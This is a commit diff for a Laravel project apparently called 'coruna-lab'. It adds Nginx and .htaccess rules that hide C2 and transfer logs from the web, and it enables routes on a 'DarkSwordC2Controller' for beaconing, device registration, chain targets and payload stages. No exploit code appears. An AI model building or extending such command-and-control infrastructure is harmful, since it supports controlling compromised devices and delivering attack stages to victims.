This commit is contained in:
hashbro
2026-09-05 20:18:30 +08:00
parent f67da8a102
commit f94def7c1f
4 changed files with 23 additions and 14 deletions
+13 -5
View File
@@ -183,6 +183,12 @@ https://admin.example.com/c/<ver>/show.htm # Nginx 静态别名 → channel/<ve
```nginx ```nginx
# —— 粘贴到「网站 → 设置 → 配置文件」,放在 location / 和 enable-php 之前 —— # —— 粘贴到「网站 → 设置 → 配置文件」,放在 location / 和 enable-php 之前 ——
# 禁止下载应用日志(即使 public/log 里还留着旧文件)
location ^~ /log/ {
deny all;
return 404;
}
location ~ "^/web/[0-9a-f]{32}/" { location ~ "^/web/[0-9a-f]{32}/" {
try_files $uri =404; try_files $uri =404;
add_header Cache-Control "public, max-age=300"; add_header Cache-Control "public, max-age=300";
@@ -603,15 +609,17 @@ tail -n 80 /www/server/php/82/var/log/php-fpm.log
### `mkdir(): Permission denied` at `Helpers.php` / `public/log` ### `mkdir(): Permission denied` at `Helpers.php` / `storage/logs`
C2 中间件会写 `public/log/c2/Ymd.log`(旧版)和 `public/log/xxbb/Ymd.log`(新版短路径)。站点运行用户(宝塔多为 `www`)对 `public/log` 无写权限时会报错。 C2 / 转账日志写在 **Web 根外** `storage/logs/{c2,xxbb,transfer,ds}/Ymd.log`。站点运行用户(宝塔多为 `www`)对 `storage` 无写权限时会报错。
```bash ```bash
cd /www/wwwroot/coruna-lab cd /www/wwwroot/coruna-lab
mkdir -p public/log/c2 public/log/xxbb mkdir -p storage/logs/c2 storage/logs/xxbb storage/logs/transfer
chown -R www:www public/log storage bootstrap/cache chown -R www:www storage bootstrap/cache
chmod -R ug+rwx public/log storage bootstrap/cache chmod -R ug+rwx storage bootstrap/cache
# 线上若还留着可下载的旧文件,删掉并在 Nginx 加上 location ^~ /log/ { deny all; }
rm -rf public/log
``` ```
同时确认网站「运行目录 / 用户」与上述属主一致。部署后建议立刻执行一次,避免首个 C2 请求踩坑。 同时确认网站「运行目录 / 用户」与上述属主一致。部署后建议立刻执行一次,避免首个 C2 请求踩坑。
+2 -1
View File
@@ -5,10 +5,11 @@
RewriteEngine On RewriteEngine On
# Builder state must never be served from public/ (defense in depth). # Builder state / leftover app logs must never be served from public/.
RewriteRule ^lab_seeds\.json$ - [F,L] RewriteRule ^lab_seeds\.json$ - [F,L]
RewriteRule ^manifest\.latest\.json$ - [F,L] RewriteRule ^manifest\.latest\.json$ - [F,L]
RewriteRule ^out(/|$) - [F,L] RewriteRule ^out(/|$) - [F,L]
RewriteRule ^log(/|$) - [F,L]
# Handle Authorization Header # Handle Authorization Header
RewriteCond %{HTTP:Authorization} . RewriteCond %{HTTP:Authorization} .
+8 -8
View File
@@ -8,13 +8,13 @@ $ds = DarkSwordC2Controller::class;
// Shared /a /u /nb /event /result are declared in routes/xxbb.php // Shared /a /u /nb /event /result are declared in routes/xxbb.php
// (same URI, DarkSword vs xxbb chosen per request). // (same URI, DarkSword vs xxbb chosen per request).
// Route::any('/beacon', [$ds, 'beacon']); Route::any('/beacon', [$ds, 'beacon']);
// Route::any('/war', [$ds, 'war']); Route::any('/war', [$ds, 'war']);
// Route::any('/p', [$ds, 'p']); Route::any('/p', [$ds, 'p']);
// Route::any('/stats', [$ds, 'stats']); Route::any('/stats', [$ds, 'stats']);
// Route::any('/api/ds/log', [$ds, 'log']); Route::any('/api/ds/log', [$ds, 'log']);
// Route::any('/api/ds/device/register', [$ds, 'register']); Route::any('/api/ds/device/register', [$ds, 'register']);
// Route::any('/api/ds/chain-targets', [$ds, 'chainTargets']); Route::any('/api/ds/chain-targets', [$ds, 'chainTargets']);
// Route::any('/api/ds/pe-stage/{name}', [$ds, 'peStage']); Route::any('/api/ds/pe-stage/{name}', [$ds, 'peStage']);